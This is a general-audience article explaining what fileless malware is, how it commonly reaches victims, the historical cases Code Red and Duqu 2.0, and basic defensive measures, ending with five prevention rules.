Fileless malware attacks are based on a type of malware that doesn't infect a computer through a traditional executable file. Instead, the malware in question resides entirely in a computer's memory, leveraging existing legitimate software to carry out its malicious activities.

Fileless malware can thus be harder to detect than traditional malware because it operates stealthily and evasively. It exploits vulnerabilities in the operating system or other software applications and often relies on social engineering techniques to trick users into executing malicious commands.

How fileless malware attacks work

This type of malicious software, which resides in the memory of a compromised system rather than on the hard drive can prove difficult to remove even using traditional antivirus software. It is therefore important to counter these threats through preventive measures that prevent malware from infecting the PC.

In fact, there are several ways in which a user can be infected with fileless malware.

Phishing Attacks: Malware can be distributed via phishing emails or social engineering techniques. The attacker sends an email with a malicious link or attachment which, if clicked, installs the malware on the user's system.

Compromised Websites: Visiting a website that has been compromised can allow malware to be installed through the use of exploit kits, which exploit vulnerabilities in the user's browser or operating system.

Malvertising: Cyber criminals can use malvertising, or malicious advertisements, to distribute fileless malware. These ads can appear on legitimate websites and can infect a user's system when they click on the ad.

Software vulnerabilities: Malware can exploit vulnerabilities in legitimate software to gain access to a user's system. It is important to keep your software up to date to prevent these types of attacks.

Once the malware is present in the system's memory, it can exploit other vulnerabilities to acquire administrator privileges and spread itself further in the system. In some cases, the malware may also attempt to perform a number of malicious operations, such as stealing sensitive information or encrypting the victim's data, and then demanding a ransom to restore the files.

A known threat

Fileless malware is nothing new. The first was in fact identified over twenty years ago, in 2001, when PCs using IIS (Microsoft's Internet Information Services) were targeted. The attack reached 359,000 servers before being identified by cybersecurity experts and dubbed Code Red. Similar techniques were then used in the following years for other attacks. In 2015, the Duqu2.0 malware carried out an attack on one of the leading IT security companies, Kaspersky Labs, again from the memory of the victim PC. The development of these techniques has grown in recent years, and the use of fileless malware by cyber criminals is increasingly widespread, thanks also to the tools that allow this type of malware to be easily developed.

How to defend against fileless malware attacks

To protect yourself from fileless malware, traditional antiviruses are not enough, which look for traces inside files but it is important to keep software and operating systems updated with the latest security patches and educate users about the risks and how to avoid falling victim of social engineering tactics. Additionally, in a corporate setting, implementing strict access controls and limiting administrative privileges can help reduce the impact of a fileless malware attack.


5 Rules to avoid being infected with fileless malware:

  1. always carry out operating system updates;
  2. avoid opening attachments to emails of dubious origin;
  3. monitor system memory;
  4. only install software from safe sites;
  5. check with specific programs all the files downloaded from the internet.


newsletter image